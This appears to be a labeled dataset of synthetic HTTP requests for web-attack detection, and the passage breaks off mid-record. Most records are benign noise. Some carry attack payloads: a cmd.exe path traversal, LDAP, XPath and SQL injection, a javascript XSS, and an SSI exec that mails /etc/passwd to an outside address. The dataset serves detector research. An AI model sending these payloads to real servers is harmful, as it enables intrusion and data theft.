Cache-Control: es8='emOnbec'
Client-ip: 79.71.44.119
Cookie: 1lo8rihOsid=86086320;nne9vnnoiIoh=988;anyHhlaoevol=uti>;otked=76062;Cyokyoteine=nc<foasrtmpee
Cookie2: $Version="024"
Date: Fri, 18 Jun 04 08:33:40 GMT
ETag: W/"l_zW--IfNE6M3bDz"
Expect: lh9t=rqsddse
From: lAuala@v9ti4o.be
If-Modified-Since: Wed, 04 Aug 04 18:14:15 CET
If-Unmodified-Since: Wed, 07 Nov 07 03:32:09 CET
If-Match: "YEWtmq8d_GwY-ZQ"
If-None-Match: *
If-Range: Mon, 05 Dec 05 12:05:04 CET
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest response="c72F6f974FCDBcBE3cbCaA8bB6EBE6b5"
Authorization: NTLM ZmZwbGluSGhhZG1yWXdDZGVyZW5lZHNhZDlyaW5lbG1OQXNna0xlbG1iZ20=
Range: -63,010806-6
Referer: /i1us/Ah9aa6E/iUciger0/mdaog/tdAbp.mdb
TE: trailers,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/3.2 (X11; U; Unix 0.4; 39-d3; rv:9.7.2) Gecko/29871316
UA-CPU: x86
UA-Disp: 3449,787,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0846x910
Via: 5.0 17.38.213.65, 0.5 192.105.225.11
Transfer-Encoding: y2dal
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 508 www.Wowebu.shtml "eitda3tdi4a9" "Wed, 29 Mar 06 15:01:52 GMT"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 912336
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11721
Start - Id: 22972
class: Valid
GET /ctterinoilut/dNkgcVa1g9/otcaHnasWatfeE5h.jpg? HTTP/1.0
Host: 232.243.102.200:80
Connection: close
Accept: image/jpeg, image/gif;q=0.8, application/rtf;q=0.5
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.3
Cache-Control: da5Ftn='norL'
Client-ip: 237.229.255.165
Cookie: srn7=nh7_H43s_.B;Sop8r=220589;joptgRLj8TAU7=m1buf;nwitrne1Rs8xrTx=ehsd4esf0o;8CiokoxTzcat7G=evhenf3mmwxp;sCG58ZxjR%u=4065585
Cookie2: $Version="724"
Date: Sun, 07 Oct 07 17:07:30 CET
ETag: W/"eHDCc8I2ruIgyos"
Expect: rEooiR
From: ap2o@ettoab6r.com
If-Modified-Since: Wed, 27 Sep 06 04:48:20 CET
If-Unmodified-Since: Mon, 07 Jan 08 09:06:41 UTC
If-Match: "643EI@VOJ4NjeCM"
If-None-Match: *
If-Range: *
Max-Forwards: 978
MIME-Version: 2.6
Pragma: dme=yttc
Proxy-Authorization: ln8a ypus=tSve
Authorization: Basic cnJ0Zm90OmdlaG1n
Range: 31732-,84218-
Referer: /7nlTH/oIwtmi/uiunr/iSu1/ihOetsl.zip
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 5.4; me-nt; rv:7.4.1) Gecko/80637964
UA-CPU: x86
UA-Disp: 052,5191,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5290x6765
Via: FTP/9.6 www.orohtxeo.html:77
Transfer-Encoding: identity
Upgrade: bae/0.4, hee6y0/8.7, soqh/2.5, sdle8/1.8, bdseN/0.5
Warning: 438 49.79.91.51:038 "rCeoI3u9lEt" "Sat, 30 Apr 05 03:17:12 GMT"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22972
Start - Id: 44461
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.mabI7.cz:02
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, iso-10646-ucs-2;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 1.111.16.222
Cookie: saaNuo=4\e;tesboblORmpsldo=92887;tpie=thAl;tTrsmnyal=diae5bttEitmP~;Iesoeae2ngfalth=r7
Cookie2: $Version="827"
Date: Mon, 10 Jul 06 05:58:38 CET
ETag: W/"2DapoEeV4Pk4GUC"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Fri, 18 Jul 08 15:32:15 CET
If-Match: *
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Sat, 17 May 08 09:59:05 UTC
Max-Forwards: 50
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest nonce
Range: 6-02287,72753-
Referer: /ooqvsee/n2auib/skUIh/fniu.png
TE: trailers
Trailer: Accept-Language
User-Agent: sndgbn4our
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/4.0 187.115.150.91, 7.7 www.gft9E.css
Transfer-Encoding: compress
Upgrade: n7n4g/9.8, isEasp/0.6, dOHut/7.0, ywG/7.6, sesne/6.3
Warning: 437 173.103.168.4:0949 "sd9tmoa" "Tue, 17 Aug 04 10:18:28 UTC"
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44461
Start - Id: 22247
class: Valid
GET /iPrbHolAa3wUM/RxbkoftL3/oqqeO2ZO/u4.fPDiaC02T/lpla/iotit01DidE/rncfntoonhze/b2X7Nirt/lileDao9mimangeh/hO-WC/d6U24lavbscript.htm?ta2icprlefeeoOe=w%3EwE&ReeIam=upT6Lbw&rrmxeern=nMB5E9e&CdKP=psa&mdFf=2830748010&execZac751ftp@=nseaslmOncz&qfeKxap1yo=06&rtdFwcr7iap0ink=74 HTTP/1.1
Host: www.esyds.fr
Connection: close
Accept: text/*, audio/*, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iTrdy-luasoN, ea-ee;q=0.2, ora-eao
Cache-Control: min-fresh=2
Client-ip: 23.49.138.81
Cookie: 4kmCD=afe(ah NhrtoS;ahrcyylE4oa5=Aswybeae;LrasIdise= soi;bs7rwsdtjhmuy3o=aoXRnrU.
Cookie2: $Version="5"
Date: Sat, 25 Feb 06 05:43:59 UTC
ETag: "tPT0Kt76NEdVilzzQA"
Expect: ljhEdvL
From: orEtts@ismhaeter.de
If-Modified-Since: Mon, 22 May 06 08:50:09 CET
If-Unmodified-Since: Wed, 18 Nov 09 22:13:21 GMT
If-Match: *
If-None-Match: *
If-Range: "t1oHWKHsTq1CWfQK"
Max-Forwards: 709
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: ngoFt8 taaec=t7nymEoi
Authorization: Digest qop=auth-int
Range: 00-
Referer: http://www.ePlonz.biz/m5efTra/rname/oiSeoc/reE0jE/4khhwte2.pl
TE: trailers,deflate;q=0.0
Trailer: TE
User-Agent: naYsVm4m http://www.0itolne0.it
UA-CPU: MIPS
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 196x167
Via: 7.6 www.ists.htm
Transfer-Encoding: identity
Upgrade: nenb/7.3
Warning: 625 www.bcOiE.htm:75 "aNlih4dh3" "Fri, 31 Mar 06 08:32:01 UTC"
X-Forwarded-For: 83.236.39.135
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22247
Start - Id: 38166
class: LdapInjection
GET /umgsjUl/lG.-w-yD/iTM/mhiwc1etrngyDlhal/vBNDYDY8/4cRfCcEAwDv-OPzA/g5q/4MxA8SESKNnBGosIQd.dll?OuanxodeYdnvo7e=ofzutnirM5&ezit=renua%29%28%26%28objectClass%3D++inee*%29&deNpnrfox7=0pupdateinsert%3Be+veapism HTTP/1.1
Host: 147.233.238.90:80
Connection: keep-alive
Accept: image/png, text/*, video/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: Yee44o-Gr;q=0.5, q-roxxcE;q=0.6, rOshn-w, noe9e-aadeOztu, 81z-ypfpitn
Cache-Control: no-store
Client-ip: 122.205.56.130
Cookie: 5sisi=ehb0;anxntirNuoh=3961008128;5-ycosaccess_logG1T4=rq r~;AcLztn1aghhgpde=mnheanwYnehYutw;hhdy6te=sz0@J3FXlju3;Ttn=rmornrmo
Cookie2: $Version="5"
Date: Mon, 02 Feb 04 10:22:01 UTC
ETag: W/"I4g._rkzJPtJSclIRTr"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 16 May 06 10:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Apr 07 05:00:35 GMT
Max-Forwards: 0410
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: Digest response="FccE9222AAefC7fBdF4E41fc40E562cd"
Range: -0244,6315-
Referer: http://www.sfigtrs.com/tri66.js
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.2 (compatible; rteot; Linux i386; g0ec; fseibl; agtjesTrsl)
UA-CPU: PowerPC
UA-Disp: 840,6467,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: HTTP/0.3 123.227.39.195, FTP/0.9 www.3nsio.jpeg, HTTP/2.7 www.15ayeFge.gif
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 105.91.132.113
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38166
Start - Id: 49931
class: XPathInjection
GET /c.@X4A_/6.g4X2Ndg.sh?becTzzaaatutoE=eeo&8nullwgetaOaLS1=781423&lnlnijdOsu=oGUgzq6ZaWCC&ie1mytyh=4848020&W26TO=%28i+%3C+++count%28eecsa%2Fchild%3A%3Atext%28%29%29+++++and++++j++++%3C++++count%28etrNaa%2Fchild%3A%3Acomment%28%29%29+++and+++k+++%3C+count%28nnl%2Fchild%3A%3A*%29++++%29&ar7p=09203 HTTP/1.0
Host: www.Ebrp4irrih.it:7245
Connection: close
Accept: image/*
Accept-Charset: windows-1257, koi8;q=0.8
Accept-Encoding: *
Accept-Language: i-baO, snr-4hegha6;q=0.4, eQu-Ta8rmN
Cache-Control: max-stale
Client-ip: 69.149.110.120
Cookie: antrsmdcg=E'8>au3Otiutenl;t.V5I7=connect$e gJuMs;zrsnfeonntf=df1zs;0QjGFO=Ed\d;nrCprrld=V7Nifgr7i
Cookie2: $Version="5"
Date: Mon, 20 Sep 04 09:11:30 GMT
ETag: "YiD1yiKB-oEJfWH8LaA"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Tue, 20 Jan 09 05:31:29 GMT
If-Unmodified-Since: Sat, 03 Jan 09 17:25:51 GMT
If-Match: *
If-None-Match: "EqgdAF2y0WZWsOuA"
If-Range: "9NtuvThsKoOxD9B6dr9z"
Max-Forwards: 009
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: 53346-
Referer: http://utmf.net/bdtt.cfm
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 9.0; dq-be; rv:1.4.1) Gecko/35962606
UA-CPU: x86
UA-Disp: 3308,0110,8
UA-Pixels: 299x2707
Via: FTP/7.9 200.91.248.156, 1.2 www.Wietryu.png, 8.3 180.50.32.187
Transfer-Encoding: gzip
Upgrade: b8rtI/0.8, eiste/5.5, i6ph/1.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49931
Start - Id: 47836
class: XSS
GET /-V_ejLsj9WaswEe/aXXWFyY5k.0X7ql/tBt-glkw/VaO/hBx@KyIfI7.jpeg?gch=%3Cmeta+http-equiv%3D++%22+++refresh++%22+++++content+++%3D+++%22+++0%3Burl%3Djavascript%3A+++%5Balert%28%27oa%27%29%3B%5D+++++%22+++%3E&derScdtnu9=3deae%3Be%28a&@R_S=Dh0tGHuculo&BVsock_streamtex=4&st1yshtaDl0daa=i2tiVcobeTgl2hstf9 HTTP/1.1
Host: 12.29.146.208
Connection: zeloNff
Accept: image/*;q=0.1, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 145.49.48.15
Cookie: kAh6dagutrea=wo7Zjk;apweaerittU2=30823668
Cookie2: $Version="459"
Date: Thu, 20 Jan 05 18:59:52 GMT
Expect: hnkndi8=thtmdr
From: pMtHteat@h2a4E.de
If-Modified-Since: Fri, 10 Mar 06 11:22:11 GMT
If-Unmodified-Since: Mon, 19 Apr 04 13:39:31 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 93
Pragma: 526w=sic
Proxy-Authorization: NTLM TDNybjkwYkRubGFlcWlucmU0c2F0ZWNudmd1dHVvbnNzQ1dtenNoZDNtc2U=
Authorization: erahd rnqLpnT2=R7de3
Referer: /iaodEeop/dsOio/lsSerd/gSll/7u2d.mpeg
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/5.3 (X11; U; Unix 8.6; mt-6y; rv:1.9.3) Gecko/20146465
Via: Edun/6.1 www.o40gondl.js:139, 3.1 www.TgTh.css
Transfer-Encoding: identity
Upgrade: dse/3.9, erre/3.1, jAtMM/7.7, eexzD/7.4
Warning: 297 www.wzsizre.html:14 "rgdedqieE" "Thu, 23 Dec 04 01:45:46 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47836
Start - Id: 35378
class: SqlInjection
GET /divT_pHvbscript/cO9zOnWgUsGHqnH8AIw3/upow6gbp/oUT0TuVGXkjltUb49o/9hPRj/efafh/ntuclzee9vtqnnpnsT4/db/Uw_/Aucnitda3dd/cS3_QIou_U_C.dll?Y3zzlink=tcseaeEhohetn&jeAWiAgcsre=a&l4imseeuo=entr%3Fboot.iniS0et+xtermnvnodTre&3eitvu9t9gegv=ceeTntelnethr+na%3E&0wM5q=077448&2ai=9250&tQoeaiuDeaesLS5=oe%3Ehomeso%3Fl&okcuS7=OR+++++%27mnlr%27+IN++%28+%27+%27++++%29&Et1n=EoecalTah&dvbntr=t%40t HTTP/1.0
Host: 91.25.170.56
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: tTter-3kelej
Cache-Control: aef='dtAu'
Client-ip: 246.233.58.195
Cookie: 0p=tGh3etetuoh
Cookie2: $Version="49"
Date: Wed, 09 Dec 09 20:30:24 GMT
ETag: W/"YrySjLvL9c7uR21"
Expect: eeosm=3uereXt
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VK6tZFF1ZfIx56bA3e7W"
If-None-Match: "kE-gY7BT_4PhVaWaP8F2"
If-Range: Sun, 14 Jan 07 04:02:04 GMT
Max-Forwards: 0242
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: y6tcst 0nr7H=5ongnato
Authorization: Basic UWJvdWFuZTpob3N1Wg==
Range: 187-
Referer: /sodiw/kubytr.dll
TE: deflate;q=0.9,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: taaWsklexy
UA-OS: Windows 95
UA-Pixels: 1597x768
Via: 3.7 33.213.144.25, FTP/0.0 235.54.172.154:9246
Transfer-Encoding: compress
Warning: 961 www.Nezio.shtml "yirNnnptNp5er5wpa6a" "Sun, 10 Jul 05 04:38:42 GMT"
X-Serial-Number: 6475982437005855
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35378
Start - Id: 19838
class: Valid
GET /l3h/wdhgwtornjmH1Ctlano/RdtiQetlnns1tuha/d7zKlsevo3S4EHyolT@/j4kXDKz_PmtzXucc/ouJw705J_NnR08T/hpwBpqQJWGDgU/sXTs6HltIYW4m1a.jpeg?Ty8Bsbgsoundv@binr=2oM+9j%27winntwb&ZOF.=xumsene&inoridsur=ces&han2pxTselect=tTGj_C&neaD4silTwfo=rum6dRnnajenbhk4ee&8hSEw=sXSq.&neTeomvdseo9s=39&5ahibooomvai=%2Fur&vAe=3q67_J&e1N=itk%40wnrolIefe&QH.S=tTh&m24DEuog=wgetvqhnhbrrsstylea%40gcs&nGenlRe41l51d=+esqat8lu-o4mge&fHtt=tmpks+&e3jrlon=ptHclen9rea4 HTTP/1.0
Host: 167.203.71.241
Connection: close
Accept: video/mpeg;q=0.0
Accept-Charset: utf-8;q=0.8, x-mac-roman
Accept-Encoding: compress, deflate;q=0.9, gzip;q=0.4, deflate
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 18.141.33.165
Cookie: aDv=7;pdad=uml;9oweaitnecl1iu=laseb
Cookie2: $Version="666"
Date: Tue, 07 Sep 04 02:33:26 UTC
ETag: W/"-JK.m7G43LW669oHLtq"
Expect: y2Szemat=aeewSu;e5dz04l=nnNt
From: ltreys@reovt.gov
If-Modified-Since: Sat, 04 Oct 08 08:24:09 CET
If-Unmodified-Since: Tue, 26 Jan 10 10:17:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 07:23:41 GMT
Max-Forwards: 1760
MIME-Version: 2.8
Pragma: Izls='eNmoor'
Proxy-Authorization: Digest username="NoExp"
Authorization: asdsca broUbot=v1Hmd
Range: 31-27672,31-,92-
Referer: http://g6nlufof.org/utpen8.wav
TE: chunked
Trailer: Accept-Encoding
User-Agent: 3du0 (3DgtNuR; 02VcuT4; 3f@Q_j8q; s_R9ERs9BV; lOAhPPHLP8)
UA-CPU: StrongARM
UA-Disp: 563,5037,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: HTTP/4.3 www.nnthubfc.png, 8.0 www.etel.js:324, nrksto/0.5 www.4ttwet9.gif
Transfer-Encoding: identity
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19838
Start - Id: 11995
class: Valid
GET /meAf2zhihng7Errrtf/fhfsrr9uGrnaOrs/epFb/m8T-FqFTH6.pl?eo=2180084&1clhatCmli8V=1nxtb8wget&rEeragun=+&R7Upmail-QQ=stmp&OnlRlneei=j+pe&e9ds4denscesii=toszu&8it=hpassthrutdo&Bs4onneg4sfiO=usrebodyi&Cott=ut&uhn=3oP%5Ct&sunrlNRn7drgE=ehttpfps HTTP/1.1
Host: 127.21.136.184:80
Connection: s4njlnv
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.0
Accept-Language: fesdvei0-n
Cache-Control: max-age=260
Client-ip: 201.224.46.9
Cookie: rcqaaagchivNM=paRrihs5nme
Cookie2: $Version="042"
Date: Sun, 11 Jul 04 23:35:14 CET
ETag: "azk_rN20wtoPDiQA8P"
Expect: tucTehl
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Tue, 27 Nov 07 01:51:52 UTC
If-Unmodified-Since: Thu, 04 Feb 10 03:48:06 CET
If-Match: "R-HPjWm2pgtWQcZW"
If-None-Match: *
If-Range: Sun, 26 Mar 06 07:22:34 CET
Max-Forwards: 0
MIME-Version: 7.7
Pragma: 8utpa=ts
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: Digest uri=http://lSed2ms.gov/5edm7s.swf
Range: 9-,78403-
Referer: http://wizrcap.it/maedxt1/ugjli.sh
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.3 (Windows; U; WinNT 4.8; qe-id; rv:8.6.6) Gecko/46766339
UA-CPU: Sparc
UA-Disp: 833,846,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 630x5808
Via: HTTP/6.8 111.193.179.135
Transfer-Encoding: gzip
Upgrade: r9sP/4.2, ek3c/8.3, hde/4.8, hcnli/4.1, mt9/7.2
Warning: 651 www.2idwSi8.htm "ewtrsoeu59anla8wPh" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11995
Start - Id: 18234
class: Valid
GET /ed1XMAwYMwSKy5PNmpQ/c1yDSYbM4dOtH/woNKdvPL/dtyYgrZbAGjvVx8SYt.css? HTTP/1.0
Host: 159.83.9.197
Connection: elaelesU
Accept: audio/x-wav;q=0.4, image/gif
Accept-Charset: x-mac-cyrillic, x-mac-turkish;q=0.4, windows-1257, cp-936;q=0.4, iso-8859-15
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 99.184.228.130
Cookie: it=bmochagiolibbeltHhudp;2ct@metaaHwinntbgsound=wde1nebodyjunionro;afdtE2=:sacdu;inputxml8RxKupdateD9=llvWyt6vhe;feKeauemL=o kee
Cookie2: $Version="634"
Date: Sun, 11 Sep 05 22:08:16 GMT
ETag: W/"xVLM-ZC4hTWiDr0C_fb@"
Expect: o7nd=orytnxr
From: hdyWf@e1t0unenyl.ch
If-Modified-Since: Tue, 11 Dec 07 14:58:09 CET
If-Unmodified-Since: Fri, 10 Oct 08 24:48:46 CET
If-Match: "bg.xDn3KHbfPM4PH8"
If-None-Match: *
If-Range: Mon, 28 Apr 08 05:28:45 GMT
Max-Forwards: 7
MIME-Version: 0.2
Pragma: lPomgr='leD'
Proxy-Authorization: Basic dGV0OGVkazp0aW9scQ==
Authorization: Basic aTdzc3NvZHQ6YmdNYXA=
Range: 41-16
Referer: /3sdn.jsp
TE: chunked;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: fchNzthf3/1.0.0.5.8
UA-CPU: PowerPC
UA-Disp: 713,1321,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 810x317
Via: 2.1 91.94.41.219, 8.3 www.innfiaj0.jpeg
Transfer-Encoding: gzip
Upgrade: nqm0iu/1.8
Warning: 763 212.227.140.5:8348 "gddLcd3eaoscn8iho" 
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 50068
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18234
Start - Id: 33717
class: Valid
PUT /cH2NtfEheerxiLetcoie/eCypS@iXsLoR8B/0eahetg2rCsmttylsoae/uedorccStdO/Cs8imyjronhp4eeh/amj.nsf? HTTP/1.1
Content-Length: 175
Content-Language: anglem4,eco5s9
Content-Encoding: deflate
Content-Location: http://www.0Okl.be/gxie.htm
Content-MD5: cmV0b21naWVzb2xyMGpwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Nov 09 03:40:59 CET
Last-Modified: Sun, 09 Oct 05 21:12:54 UTC
Host: 214.169.214.15
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: tmgt-r;q=0.4, nemtih-te, a5rt5nc-t;q=0.5
Cache-Control: min-fresh=8
Client-ip: 178.20.130.175
Cookie: rmnaenoln1srl=3126306;ol893n9oi=i200A;mebweieotneoe=sCQHmr;et=tdAG
Cookie2: $Version="4"
Date: Wed, 19 Apr 06 09:18:04 CET
ETag: "eI63ieTvwWMSE-kfmw"
Expect: oM4iit=9tedi
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Wed, 01 Nov 06 01:31:15 GMT
If-Unmodified-Since: Tue, 20 Jun 06 07:29:27 CET
If-Match: *
If-None-Match: *
If-Range: "UsD8dWGdf8TtOoe-"
Max-Forwards: 33
MIME-Version: 5.8
Pragma: e8oo1=lnqner
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM ZWJqZ3Bxc2RwaWVxZXJya28zRWVtcTFnaWV0NHJlaGR3bmNuMWF4
Range: 46-99000
Referer: /btuem4/el2st/neteowi.asp
TE: chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: 1CvSDkE1 http://www.iotOHe.ch
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 520x205
Via: 8.1 4.34.233.82, 6.1 245.224.38.40:85, FTP/1.0 226.26.118.28:804
Transfer-Encoding: compress
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 169 www.deqz.htm:7727 "bhneliecthdnon3n6p" 
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jo=7838&i4iccbseniwouss=6272&o0clrhiheOh=50&nj6chaEznye8h4e=e7ZWFRmbtoZ&cpd4hndimoesise=iiAp&PrwrehhGthr=ihewinnt]6r|bOiBservices(Wea1phpn&7tshCararrmo=access_logloasTa3

End - Id: 33717
Start - Id: 34037
class: Valid
POST /itrbs/1winntkKiT40/ea3oesarl8ni8bSeoaes/xrje5eElnSObt6e/A8r/oSsG/gFsIl8c.s/zosiy/r8nnBXY_dpewPt.EB@/tet7kRtsuzrb8aHrc/inArX.php4? HTTP/1.1
Content-Length: 48
Content-Language: rLieuy6s
Content-Encoding: deflate
Content-Location: /ecxm9/ivmvb/ed1eey9l/mo9rfoEe.pl
Content-MD5: NTZtbndBN2NubGdvdW5jZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Mar 07 10:05:19 UTC
Last-Modified: Fri, 23 Feb 07 04:39:30 GMT
Host: www.ogqo.gov
Connection: otan2dr
Accept: */*
Accept-Charset: euc-cn;q=0.8
Accept-Encoding: gzip;q=0.7, gzip, deflate;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 98.173.105.29
Cookie: woehlQaTs=setcgetmpcf;php2[amtf[;yasXwTmD9ommsu=ohG3EML@GBsX;wt=dei7howtsOan;tapv1llus0=3815878288
Cookie2: $Version="899"
Date: Tue, 10 Feb 04 16:22:27 CET
ETag: "Z-Q6Tru9Of9V8gU"
Expect: 100-continue
From: nfaArT@c8eeenfHb.org
If-Modified-Since: Sat, 12 Jul 08 08:58:29 GMT
If-Unmodified-Since: Mon, 03 Oct 05 03:27:10 GMT
If-Match: *
If-None-Match: *
If-Range: "iNRj2iUZ8H-XyCmkh"
Max-Forwards: 09
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: mub9 8radpf=mser
Range: -72
Referer: http://d7te.ch/demmrT/h8Db2/Tlnsn/bnridHa.msf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 6.8; ua-z4; rv:6.4.6) Gecko/04649683
UA-CPU: PowerPC
UA-Disp: 6904,9748,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 682x2942
Via: HTTP/8.2 www.hwzmng.html, 1.4 www.otteiter.js, 5.8 www.f59nia.gif:72690
Transfer-Encoding: epsmd; hhyrohz8=iOiv
Upgrade: anaia/9.7, aiu/9.9, oWi5re/8.7
Warning: 786 www.n2xtrct.html "oNtzTur" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 312663342
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e2Ag3odroCmeq8T=55522475&se3snksh=irle3lcloa8ead

End - Id: 34037
Start - Id: 40155
class: SSI
GET /oee/omHwgetcU/-T70t/rOYz/gngdemstaEmt/rCeCs/i0/iA0I/Ciy8rehtaNisssd/o90zWlJYyf9f/eh0Ao1elaaI/cm.js?ohp0rn7m=mAU5XOOr&uqgcna8oqsEpr=ruohi+oconnectlink&aoA=kt&txet2tlSrh=+%7Eae&oiaraoeudeomb=48292&sP=38303605&Ctwc=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fmail+++atqlFxgrop.com++++%3C+++%2Fetc%2Fpasswd%22--%3E&rtJunlbInt=99761396&lD5N=+n+systemxp_&lyye=t0OfOdz&w6.bU=37551&YbVRsX=pvrQOvWFrD&rnaMtdsh=17&eyuMWXP=lH20yQx&giga4h=89153 HTTP/1.0
Host: www.sejernt.cz:180
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-cyrillic, macintosh, cp-936, hz-gb-2312;q=0.9
Accept-Encoding: *
Accept-Language: LngNhedt-weotcu4;q=0.5
Cache-Control: no-cache
Client-ip: 163.65.44.55
Cookie: mznOmtiec2e=oqiuj d sfshutdown]ni;cm9oI=fg4nDtnah0e
Cookie2: $Version="8"
Date: Sun, 23 Nov 08 09:42:27 GMT
ETag: W/"fwPq9i.9FDenawS"
Expect: t3ettda=ktisluei;iw3hm
From: stce@ygsk.st
If-Modified-Since: Sat, 27 Nov 04 02:49:47 UTC
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 4
